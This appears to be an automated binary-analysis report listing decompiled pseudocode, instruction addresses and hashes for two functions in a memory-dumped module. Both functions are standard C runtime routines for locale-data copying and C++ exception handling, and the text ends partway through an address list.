Opcode ID: 1b444a255f3ad571a2232bf86c541bdcaa64eb6311f5b011bff83433bd5c1146
Instruction ID: ed384918be04345ea7fd07833a854b2df2e40a7c4904b23ae768b1ab89107797
Opcode Fuzzy Hash: 1b444a255f3ad571a2232bf86c541bdcaa64eb6311f5b011bff83433bd5c1146
Instruction Fuzzy Hash: 95314E71608605AFEB618AF8D840B8673F8FF10318F204A1AE069D7151EF75E9C8EF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DD923, Relevance: 18.4, APIs: 12, Instructions: 374
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6E1DD923(void* __edx, void* __fp0, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				intOrPtr* _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				char* _t258;
				void* _t277;

				_t277 = __fp0;
				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E6E1D16BE(1, 0x50);
					_v8 = _t235;
					E6E1D1BE4(0);
					if(_t235 != 0) {
						_t228 = E6E1D16BE(1, 4);
						_v12 = _t228;
						E6E1D1BE4(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x6e218070, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E6E1D16BE(1, 4);
							_v16 = _t233;
							E6E1D1BE4(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t238 = E6E1D3A02(_t209, _t225, _t234, _t235, _t277);
								_t239 = _t238 | E6E1D3A02(_t209, _t225, _t234, _t238, _t277,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t240 = _t239 | E6E1D3A02(_t209, _t225, _t234, _t239, _t277,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t241 = _t240 | E6E1D3A02(_t209, _t225, _t234, _t240, _t277,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t242 = _t241 | E6E1D3A02(_t209, _t225, _t234, _t241, _t277,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t243 = _t242 | E6E1D3A02(_t209, _t225, _t234, _t242, _t277,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t244 = _t243 | E6E1D3A02(_t209, _t225, _t234, _t243, _t277);
								_t245 = _t244 | E6E1D3A02(_t209, _t225, _t234, _t244, _t277,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t246 = _t245 | E6E1D3A02(_t209, _t225, _t234, _t245, _t277,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t247 = _t246 | E6E1D3A02(_t209, _t225, _t234, _t246, _t277,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t248 = _t247 | E6E1D3A02(_t209, _t225, _t234, _t247, _t277,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t249 = _t248 | E6E1D3A02(_t209, _t225, _t234, _t248, _t277,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t250 = _t249 | E6E1D3A02(_t209, _t225, _t234, _t249, _t277);
								_t251 = _t250 | E6E1D3A02(_t209, _t225, _t234, _t250, _t277,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t252 = _t251 | E6E1D3A02(_t209, _t225, _t234, _t251, _t277,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t253 = _t252 | E6E1D3A02(_t209, _t225, _t234, _t252, _t277,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t254 = _t253 | E6E1D3A02(_t209, _t225, _t234, _t253, _t277,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t255 = _t254 | E6E1D3A02(_t209, _t225, _t234, _t254, _t277,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t256 = _t255 | E6E1D3A02(_t209, _t225, _t234, _t255, _t277);
								_t257 = _t256 | E6E1D3A02(_t209, _t225, _t234, _t256, _t277,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E6E1D3A02(_t209, _t225, _t234, _t257, _t277,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t257) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t195 =  *_t227;
										if(_t195 == 0) {
											break;
										}
										_t61 = _t195 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t195 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t196 = _t258 + 1;
												_t222 =  *_t196;
												 *_t258 = _t222;
												_t258 = _t196;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E6E1DD825(_v8);
								E6E1D1BE4(_v8);
								E6E1D1BE4(_v12);
								E6E1D1BE4(_v16);
								goto L4;
							}
							E6E1D1BE4(_t235);
							E6E1D1BE4(_v12);
							L7:
							goto L4;
						}
						E6E1D1BE4(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x6e218070;
					L26:
					_t105 =  *(_t209 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E6E1D1BE4( *(_t209 + 0x88));
							E6E1D1BE4( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x6e1dd923
0x6e1dd923
0x6e1dd92c
0x6e1dd933
0x6e1dd936
0x6e1dd939
0x6e1dd942
0x6e1dd964
0x6e1dd968
0x6e1dd96b
0x6e1dd975
0x6e1dd988
0x6e1dd98c
0x6e1dd98f
0x6e1dd999
0x6e1dd9ab
0x6e1ddc3e
0x6e1ddc3f
0x6e1ddc41
0x6e1ddc49
0x6e1ddc4d
0x6e1ddc52
0x6e1ddc5d
0x6e1ddc69
0x6e1ddc75
0x6e1ddc81
0x6e1ddc87
0x6e1ddc8b
0x6e1ddc8d
0x6e1ddc8d
0x00000000
0x6e1ddc8b
0x6e1dd9ba
0x6e1dd9be
0x6e1dd9c1
0x6e1dd9cb
0x6e1dd9df
0x6e1dd9e5
0x6e1dd9fa
0x6e1dda0e
0x6e1dda25
0x6e1dda3f
0x6e1dda47
0x6e1dda59
0x6e1dda70
0x6e1dda87
0x6e1ddaa1
0x6e1ddab8
0x6e1ddacf
0x6e1ddae6
0x6e1ddb00
0x6e1ddb17
0x6e1ddb2e
0x6e1ddb45
0x6e1ddb5f
0x6e1ddb76
0x6e1ddb8d
0x6e1ddb95
0x6e1ddb96
0x6e1ddb98
0x6e1ddba4
0x6e1ddbbe
0x6e1ddbda
0x6e1ddc08
0x6e1ddc17
0x6e1ddc17
0x6e1ddc1b
0x00000000
0x00000000
0x6e1ddc0c
0x6e1ddc0c
0x6e1ddc12
0x6e1ddc21
0x6e1ddc16
0x6e1ddc16
0x00000000
0x6e1ddc16
0x6e1ddc23
0x6e1ddc25
0x6e1ddc25
0x6e1ddc28
0x6e1ddc2a
0x6e1ddc2c
0x6e1ddc2e
0x00000000
0x6e1ddc32
0x6e1ddc14
0x00000000
0x6e1ddc14
0x00000000
0x6e1ddc1d
0x6e1ddbe0
0x6e1ddbe6
0x6e1ddbef
0x6e1ddbf8
0x00000000
0x6e1ddbfd
0x6e1dd9ce
0x6e1dd9d7
0x6e1dd9a1
0x00000000
0x6e1dd9a1
0x6e1dd99c
0x00000000
0x6e1dd99c
0x6e1dd977
0x00000000
0x6e1dd94c
0x6e1dd94c
0x6e1dd94e
0x6e1dd951
0x6e1ddc8f
0x6e1ddc8f
0x6e1ddc97
0x6e1ddc99
0x6e1ddc99
0x6e1ddca1
0x6e1ddca6
0x6e1ddcaa
0x6e1ddcb2
0x6e1ddcba
0x6e1ddcc0
0x6e1ddcaa
0x6e1ddcc4
0x6e1ddcc9
0x6e1ddccf
0x00000000
0x6e1ddccf

APIs

_free.LIBCMT ref: 6E1DD96B
_free.LIBCMT ref: 6E1DD98F
_free.LIBCMT ref: 6E1DD99C
_free.LIBCMT ref: 6E1DD9C1
_free.LIBCMT ref: 6E1DD9CE
_free.LIBCMT ref: 6E1DD9D7
_free.LIBCMT ref: 6E1DDCB2
_free.LIBCMT ref: 6E1DDCBA

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9b1cc49af3116dea0f4e94e03de3789cfd5a80be2cd62c9943ff57d75b574701
Instruction ID: 4c43e8424717fec07778a2335986267873e8ca6f62314d376409786967e42433
Opcode Fuzzy Hash: 9b1cc49af3116dea0f4e94e03de3789cfd5a80be2cd62c9943ff57d75b574701
Instruction Fuzzy Hash: 1CC14472E40214AFDB10CBE8CC86FDEB7FCAB08745F150565FA05EB285E67099899B60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE57F, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E6E1AE57F(signed int __ecx, signed int __edx, void* __fp0, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t203;
				void* _t204;
				signed int _t205;
				char _t206;
				signed int _t208;
				signed int _t210;
				signed char* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				void* _t220;
				signed char* _t223;
				void* _t225;
				void* _t226;
				signed char _t230;
				signed int _t231;
				void* _t233;
				signed int _t234;
				void* _t237;
				void* _t240;
				signed char _t247;
				intOrPtr* _t252;
				void* _t255;
				signed int* _t257;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t303;
				signed char* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t308;
				signed char* _t311;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t333;
				void* _t335;
				void* _t337;
				void* _t338;
				void* _t339;
				void* _t340;
				void* _t361;

				_t361 = __fp0;
				_t303 = __edx;
				_t279 = __ecx;
				_push(_t322);
				_t308 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t203 = E6E1B5E2B(_a8, _a16, _t308);
				_t338 = _t337 + 0xc;
				_v16 = _t203;
				if(_t203 < 0xffffffff || _t203 >= _t308[1]) {
					L69:
					_t204 = E6E1C4D58(_t274, _t279, _t303, _t308, _t322, _t361);
					asm("int3");
					_t335 = _t338;
					_t339 = _t338 - 0x38;
					_push(_t274);
					_t275 = _v116;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t204;
					} else {
						_push(_t322);
						_push(_t308);
						_t205 = E6E1AE203(_t275, _t279, _t303, _t308, _t322, _t361);
						__eflags =  *(_t205 + 8);
						if( *(_t205 + 8) != 0) {
							__imp__EncodePointer(0);
							_t322 = _t205;
							_t225 = E6E1AE203(_t275, _t279, _t303, 0, _t322, _t361);
							__eflags =  *((intOrPtr*)(_t225 + 8)) - _t322;
							if( *((intOrPtr*)(_t225 + 8)) != _t322) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t217 = E6E1AAA7F(_t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t339 = _t339 + 0x1c;
										__eflags = _t217;
										if(_t217 != 0) {
											L86:
											return _t217;
										}
									}
								}
							}
						}
						_t206 = _a16;
						_v28 = _t206;
						_v24 = 0;
						__eflags =  *(_t206 + 0xc);
						if( *(_t206 + 0xc) > 0) {
							_push(_a24);
							E6E1AA9B1(_t275, _t279, 0, _t322, _t361,  &_v44,  &_v28, _a20, _a12, _t206);
							_t305 = _v40;
							_t340 = _t339 + 0x18;
							_t217 = _v44;
							_v20 = _t217;
							_v12 = _t305;
							__eflags = _t305 - _v32;
							if(_t305 >= _v32) {
								goto L86;
							}
							_t281 = _t305 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t220 = memcpy( &_v64,  *((intOrPtr*)( *_t217 + 0x10)) + _t281, _t282 << 2);
								_t340 = _t340 + 0xc;
								__eflags = _v64 - _t220;
								if(_v64 > _t220) {
									goto L85;
								}
								__eflags = _t220 - _v60;
								if(_t220 > _v60) {
									goto L85;
								}
								_t223 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t223[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L83:
									__eflags =  *_t223 & 0x00000040;
									if(( *_t223 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E1AE4FF(_t305, _t361, _t275, _a4, _a8, _a12, _a16, _t223, 0,  &_v64, _a24, _a28);
										_t305 = _v12;
										_t340 = _t340 + 0x30;
									}
									goto L85;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L85;
								}
								goto L83;
								L85:
								_t305 = _t305 + 1;
								_t217 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t305;
								_v16 = _t281;
								__eflags = _t305 - _v32;
							} while (_t305 < _v32);
							goto L86;
						}
						E6E1C4D58(_t275, _t279, _t303, 0, _t322, _t361);
						asm("int3");
						_push(_t335);
						_t304 = _v188;
						_push(_t275);
						_push(_t322);
						_push(0);
						_t208 = _t304[4];
						__eflags = _t208;
						if(_t208 == 0) {
							L111:
							_t210 = 1;
							__eflags = 1;
						} else {
							_t280 = _t208 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L111;
							} else {
								__eflags =  *_t304 & 0x00000080;
								_t311 = _v0;
								if(( *_t304 & 0x00000080) == 0) {
									L93:
									_t276 = _t311[4];
									_t324 = 0;
									__eflags = _t208 - _t276;
									if(_t208 == _t276) {
										L103:
										__eflags =  *_t311 & 0x00000002;
										if(( *_t311 & 0x00000002) == 0) {
											L105:
											_t211 = _a4;
											__eflags =  *_t211 & 0x00000001;
											if(( *_t211 & 0x00000001) == 0) {
												L107:
												__eflags =  *_t211 & 0x00000002;
												if(( *_t211 & 0x00000002) == 0) {
													L109:
													_t324 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t304 & 0x00000002;
													if(( *_t304 & 0x00000002) != 0) {
														goto L109;
													}
												}
											} else {
												__eflags =  *_t304 & 0x00000001;
												if(( *_t304 & 0x00000001) != 0) {
													goto L107;
												}
											}
										} else {
											__eflags =  *_t304 & 0x00000008;
											if(( *_t304 & 0x00000008) != 0) {
												goto L105;
											}
										}
										_t210 = _t324;
									} else {
										_t187 = _t276 + 8; // 0x6e
										_t212 = _t187;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t212;
											if(_t277 !=  *_t212) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L99:
												_t213 = _t324;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t212 + 1));
												if(_t278 !=  *((intOrPtr*)(_t212 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t212 = _t212 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L99;
													}
												}
											}
											L101:
											__eflags = _t213;
											if(_t213 == 0) {
												goto L103;
											} else {
												_t210 = 0;
											}
											goto L112;
										}
										asm("sbb eax, eax");
										_t213 = _t212 | 0x00000001;
										__eflags = _t213;
										goto L101;
									}
								} else {
									__eflags =  *_t311 & 0x00000010;
									if(( *_t311 & 0x00000010) != 0) {
										goto L111;
									} else {
										goto L93;
									}
								}
							}
						}
						L112:
						return _t210;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						_t322 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t322 = 0;
						if(_t274[0x1c] != 0) {
							L24:
							_t279 = _a12;
							_v12 = _t279;
							goto L26;
						} else {
							_t226 = E6E1AE203(_t274, _t279, _t303, _t308, 0, _t361);
							if( *((intOrPtr*)(_t226 + 0x10)) == 0) {
								L63:
								return _t226;
							} else {
								_t274 =  *(E6E1AE203(_t274, _t279, _t303, _t308, 0, _t361) + 0x10);
								_t265 = E6E1AE203(_t274, _t279, _t303, _t308, 0, _t361);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t265 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t322) {
									goto L69;
								} else {
									if( *((intOrPtr*)(E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361) + 0x1c)) == _t322) {
										L25:
										_t279 = _v12;
										_t203 = _v16;
										L26:
										_v56 = _t308;
										_v52 = _t322;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L59:
											__eflags = _t308[3] - _t322;
											if(_t308[3] <= _t322) {
												goto L62;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L69;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t203);
													_push(_t308);
													_push(_a16);
													_push(_t279);
													_push(_a8);
													_push(_t274);
													L70();
													_t338 = _t338 + 0x20;
													goto L62;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L59;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L31:
													__eflags = _t308[3] - _t322;
													if(_t308[3] > _t322) {
														_push(_a28);
														E6E1AA9B1(_t274, _t279, _t308, _t322, _t361,  &_v72,  &_v56, _t203, _a16, _t308);
														_t303 = _v68;
														_t338 = _t338 + 0x18;
														_t252 = _v72;
														_v48 = _t252;
														_v20 = _t303;
														__eflags = _t303 - _v60;
														if(_t303 < _v60) {
															_t294 = _t303 * 0x14;
															__eflags = _t294;
															_v36 = _t294;
															do {
																_t295 = 5;
																_t255 = memcpy( &_v108,  *((intOrPtr*)( *_t252 + 0x10)) + _t294, _t295 << 2);
																_t338 = _t338 + 0xc;
																__eflags = _v108 - _t255;
																if(_v108 <= _t255) {
																	__eflags = _t255 - _v104;
																	if(_t255 <= _v104) {
																		_t298 = 0;
																		_v24 = 0;
																		__eflags = _v96;
																		if(_v96 != 0) {
																			_t257 =  *(_t274[0x1c] + 0xc);
																			_t306 =  *_t257;
																			_t258 =  &(_t257[1]);
																			__eflags = _t258;
																			_v40 = _t258;
																			_t259 = _v92;
																			_v44 = _t306;
																			_v28 = _t259;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t321 = _v40;
																				_t333 = _t306;
																				__eflags = _t333;
																				if(_t333 <= 0) {
																					goto L42;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t260 =  &_v88;
																						_push( *_t321);
																						_push(_t260);
																						L89();
																						_t338 = _t338 + 0xc;
																						__eflags = _t260;
																						if(_t260 != 0) {
																							break;
																						}
																						_t333 = _t333 - 1;
																						_t321 = _t321 + 4;
																						__eflags = _t333;
																						if(_t333 > 0) {
																							continue;
																						} else {
																							_t298 = _v24;
																							_t259 = _v28;
																							_t306 = _v44;
																							goto L42;
																						}
																						goto L45;
																					}
																					_push(_a24);
																					_v5 = 1;
																					_push(_v32);
																					E6E1AE4FF(_t306, _t361, _t274, _a8, _v12, _a16, _a20,  &_v88,  *_t321,  &_v108, _a28, _a32);
																					_t338 = _t338 + 0x30;
																				}
																				L45:
																				_t303 = _v20;
																				goto L46;
																				L42:
																				_t298 = _t298 + 1;
																				_t259 = _t259 + 0x10;
																				_v24 = _t298;
																				_v28 = _t259;
																				__eflags = _t298 - _v96;
																			} while (_t298 != _v96);
																			goto L45;
																		}
																	}
																}
																L46:
																_t303 = _t303 + 1;
																_t252 = _v48;
																_t294 = _v36 + 0x14;
																_v20 = _t303;
																_v36 = _t294;
																__eflags = _t303 - _v60;
															} while (_t303 < _v60);
															_t308 = _a20;
															_t322 = 0;
															__eflags = 0;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6E1ADB27(__eflags);
														_t279 = _t274;
													}
													__eflags = _v5;
													if(_v5 != 0) {
														L62:
														_t226 = E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361);
														__eflags =  *((intOrPtr*)(_t226 + 0x1c)) - _t322;
														if( *((intOrPtr*)(_t226 + 0x1c)) != _t322) {
															goto L69;
														} else {
															goto L63;
														}
													} else {
														__eflags = ( *_t308 & 0x1fffffff) - 0x19930521;
														if(( *_t308 & 0x1fffffff) < 0x19930521) {
															goto L62;
														} else {
															__eflags = _t308[7];
															if(_t308[7] != 0) {
																L55:
																_t230 = _t308[8] >> 2;
																__eflags = _t230 & 0x00000001;
																if((_t230 & 0x00000001) == 0) {
																	_push(_t308[7]);
																	_t231 = E6E1AF04A(_t361, _t274);
																	_pop(_t279);
																	__eflags = _t231;
																	if(_t231 == 0) {
																		goto L66;
																	} else {
																		goto L62;
																	}
																} else {
																	 *(E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361) + 0x10) = _t274;
																	_t240 = E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361);
																	_t290 = _v12;
																	 *((intOrPtr*)(_t240 + 0x14)) = _v12;
																	goto L64;
																}
															} else {
																_t247 = _t308[8] >> 2;
																__eflags = _t247 & 0x00000001;
																if((_t247 & 0x00000001) == 0) {
																	goto L62;
																} else {
																	__eflags = _a28;
																	if(_a28 != 0) {
																		goto L62;
																	} else {
																		goto L55;
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L31;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L59;
														} else {
															goto L31;
														}
													}
												}
											}
										}
									} else {
										_v20 =  *((intOrPtr*)(E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361) + 0x1c));
										_t270 = E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361);
										_push(_v20);
										 *(_t270 + 0x1c) = _t322;
										_t271 = E6E1AF04A(_t361, _t274);
										_pop(_t290);
										if(_t271 != 0) {
											goto L25;
										} else {
											_t308 = _v20;
											_t359 =  *_t308 - _t322;
											if( *_t308 <= _t322) {
												L64:
												E6E1CEE20(_t274, _t290, _t303, _t308, __eflags, _t361);
											} else {
												_t300 = _t322;
												_v20 = _t322;
												while(E6E1AEC58( *((intOrPtr*)(_t300 + _t308[1] + 4)), _t359, 0x6e22086c) == 0) {
													_t322 = _t322 + 1;
													_t290 = _v20 + 0x10;
													_v20 = _v20 + 0x10;
													_t359 = _t322 -  *_t308;
													if(_t322 >=  *_t308) {
														goto L64;
													} else {
														continue;
													}
													goto L65;
												}
											}
											L65:
											_push(1);
											_push(_t274);
											E6E1ADB27(__eflags);
											_t279 =  &_v68;
											E6E1AEC2D( &_v68);
											E6E1ADABB( &_v68, 0x6e216984);
											L66:
											 *(E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361) + 0x10) = _t274;
											_t233 = E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361);
											_t279 = _v12;
											 *(_t233 + 0x14) = _v12;
											_t234 = _a32;
											__eflags = _t234;
											if(_t234 == 0) {
												_t234 = _a8;
											}
											E6E1AAB95(_t279, _t234, _t274);
											E6E1AEF3F(_a8, _a16, _t308);
											_t237 = E6E1AF16A(_t308);
											_t338 = _t338 + 0x10;
											_push(_t237);
											E6E1AEEB6(_t274, _t279, _t303, _t308, _t322, _t361);
											goto L69;
										}
									}
								}
							}
						}
					}
				}
			}

0x6e1ae57f
0x6e1ae57f
0x6e1ae57f
0x6e1ae586
0x6e1ae588
0x6e1ae591
0x6e1ae597
0x6e1ae59a
0x6e1ae59f
0x6e1ae5a2
0x6e1ae5a8
0x6e1ae92f
0x6e1ae92f
0x6e1ae934
0x6e1ae936
0x6e1ae938
0x6e1ae93b
0x6e1ae93c
0x6e1ae93f
0x6e1ae945
0x6e1aea64
0x6e1ae94b
0x6e1ae94b
0x6e1ae94c
0x6e1ae94d
0x6e1ae954
0x6e1ae957
0x6e1ae95a
0x6e1ae960
0x6e1ae962
0x6e1ae967
0x6e1ae96a
0x6e1ae96c
0x6e1ae972
0x6e1ae974
0x6e1ae97a
0x6e1ae98f
0x6e1ae994
0x6e1ae997
0x6e1ae999
0x6e1aea60
0x00000000
0x6e1aea61
0x6e1ae999
0x6e1ae97a
0x6e1ae972
0x6e1ae96a
0x6e1ae99f
0x6e1ae9a2
0x6e1ae9a5
0x6e1ae9a8
0x6e1ae9ab
0x6e1ae9b1
0x6e1ae9c3
0x6e1ae9c8
0x6e1ae9cb
0x6e1ae9ce
0x6e1ae9d1
0x6e1ae9d4
0x6e1ae9d7
0x6e1ae9da
0x00000000
0x00000000
0x6e1ae9e0
0x6e1ae9e0
0x6e1ae9e3
0x6e1ae9e6
0x6e1ae9f5
0x6e1ae9f6
0x6e1ae9f6
0x6e1ae9f8
0x6e1ae9fb
0x00000000
0x00000000
0x6e1ae9fd
0x6e1aea00
0x00000000
0x00000000
0x6e1aea0e
0x6e1aea10
0x6e1aea13
0x6e1aea15
0x6e1aea1d
0x6e1aea1d
0x6e1aea20
0x6e1aea22
0x6e1aea24
0x6e1aea40
0x6e1aea45
0x6e1aea48
0x6e1aea48
0x00000000
0x6e1aea20
0x6e1aea17
0x6e1aea1b
0x00000000
0x00000000
0x00000000
0x6e1aea4b
0x6e1aea4e
0x6e1aea4f
0x6e1aea52
0x6e1aea55
0x6e1aea58
0x6e1aea5b
0x6e1aea5b
0x00000000
0x6e1ae9e6
0x6e1aea65
0x6e1aea6a
0x6e1aea6b
0x6e1aea6e
0x6e1aea71
0x6e1aea72
0x6e1aea73
0x6e1aea74
0x6e1aea77
0x6e1aea79
0x6e1aeaf1
0x6e1aeaf3
0x6e1aeaf3
0x6e1aea7b
0x6e1aea7b
0x6e1aea7e
0x6e1aea81
0x00000000
0x6e1aea83
0x6e1aea83
0x6e1aea86
0x6e1aea89
0x6e1aea90
0x6e1aea90
0x6e1aea93
0x6e1aea95
0x6e1aea97
0x6e1aeac9
0x6e1aeac9
0x6e1aeacc
0x6e1aead3
0x6e1aead3
0x6e1aead6
0x6e1aead9
0x6e1aeae0
0x6e1aeae0
0x6e1aeae3
0x6e1aeaea
0x6e1aeaec
0x6e1aeaec
0x6e1aeae5
